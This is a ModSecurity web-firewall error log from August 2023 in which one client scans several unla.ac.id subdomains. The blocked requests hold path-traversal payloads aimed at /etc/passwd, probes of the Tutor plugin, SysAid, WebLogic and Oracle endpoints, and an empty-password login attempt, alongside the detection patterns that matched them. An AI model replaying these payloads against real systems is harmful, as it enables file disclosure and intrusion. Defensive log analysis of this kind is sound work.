[Tue Aug 29 11:48:09.404509 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjYrCwAAAAK"]
[Tue Aug 29 11:48:09.416690 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjM7JYAAAAT"]
[Tue Aug 29 11:48:09.418838 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAklexQAAAAD"]
[Tue Aug 29 11:48:09.422375 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAj12CoAAAAa"]
[Tue Aug 29 11:48:09.435221 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjM7JcAAAAT"]
[Tue Aug 29 11:48:09.460581 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjbw8EAAAAW"]
[Tue Aug 29 11:48:09.463039 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAj12CwAAAAa"]
[Tue Aug 29 11:48:09.477500 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAkGCXQAAAAE"]
[Tue Aug 29 11:48:09.482170 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAkdu9IAAAAO"]
[Tue Aug 29 11:48:09.482527 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAj12C0AAAAa"]
[Tue Aug 29 11:48:09.496713 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjM7JoAAAAT"]
[Tue Aug 29 11:48:10.354580 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14isCo-f0AAAkAL-sAAAAU"]
[Tue Aug 29 11:48:11.368109 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjbw8oAAAAW"]
[Tue Aug 29 11:48:11.377122 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkksIgAAAAA"]
[Tue Aug 29 11:48:11.388047 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjbw8sAAAAW"]
[Tue Aug 29 11:48:11.410965 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjtc7cAAAAX"]
[Tue Aug 29 11:48:11.437003 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkksIsAAAAA"]
[Tue Aug 29 11:48:12.353502 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkksJYAAAAA"]
[Tue Aug 29 11:48:12.376197 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAhujBIAAAAr"]
[Tue Aug 29 11:48:12.377255 2023] [:error] [pid 2345] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkpFWwAAAAI"]
[Tue Aug 29 11:48:12.472717 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkoTf4AAAAH"]
[Tue Aug 29 11:48:12.531522 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN4YAAAAL"]
[Tue Aug 29 11:48:12.532229 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkoTgEAAAAH"]
[Tue Aug 29 11:48:12.553527 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAfWN4cAAAAL"]
[Tue Aug 29 11:48:12.636122 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgYAAAAH"]
[Tue Aug 29 11:48:12.636180 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgYAAAAH"]
[Tue Aug 29 11:48:12.657486 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkoTgcAAAAH"]
[Tue Aug 29 11:48:12.711551 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN44AAAAL"]
[Tue Aug 29 11:48:12.757197 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkoTgwAAAAH"]
[Tue Aug 29 11:48:13.365376 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "ft.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBMAAAAr"]
[Tue Aug 29 11:48:13.365473 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBMAAAAr"]
[Tue Aug 29 11:48:13.379062 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "www.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThQAAAAH"]
[Tue Aug 29 11:48:13.379121 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThQAAAAH"]
[Tue Aug 29 11:48:13.383579 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "informatika.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkksJ8AAAAA"]
[Tue Aug 29 11:48:13.383617 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkksJ8AAAAA"]
[Tue Aug 29 11:48:13.403601 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "journal.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBUAAAAr"]
[Tue Aug 29 11:48:13.403643 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBUAAAAr"]
[Tue Aug 29 11:48:13.443985 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "pusatbahasa.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThcAAAAH"]
[Tue Aug 29 11:48:13.444026 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThcAAAAH"]
[Tue Aug 29 11:48:13.465492 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14jcCo-f0AAAhujBgAAAAr"]
[Tue Aug 29 11:48:13.486982 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jcCo-f0AAAhujBkAAAAr"]
[Tue Aug 29 11:48:14.418422 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jsCo-f0AAAkaDCkAAAAJ"]
[Tue Aug 29 11:48:17.746596 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAdxU0oAAAAC"]
[Tue Aug 29 11:48:17.792338 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAjbw@kAAAAW"]
[Tue Aug 29 11:48:17.807322 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAdxU00AAAAC"]
[Tue Aug 29 11:48:17.812458 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAjbw@oAAAAW"]
[Tue Aug 29 11:48:18.350771 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14ksCo-f0AAAkAME0AAAAU"]
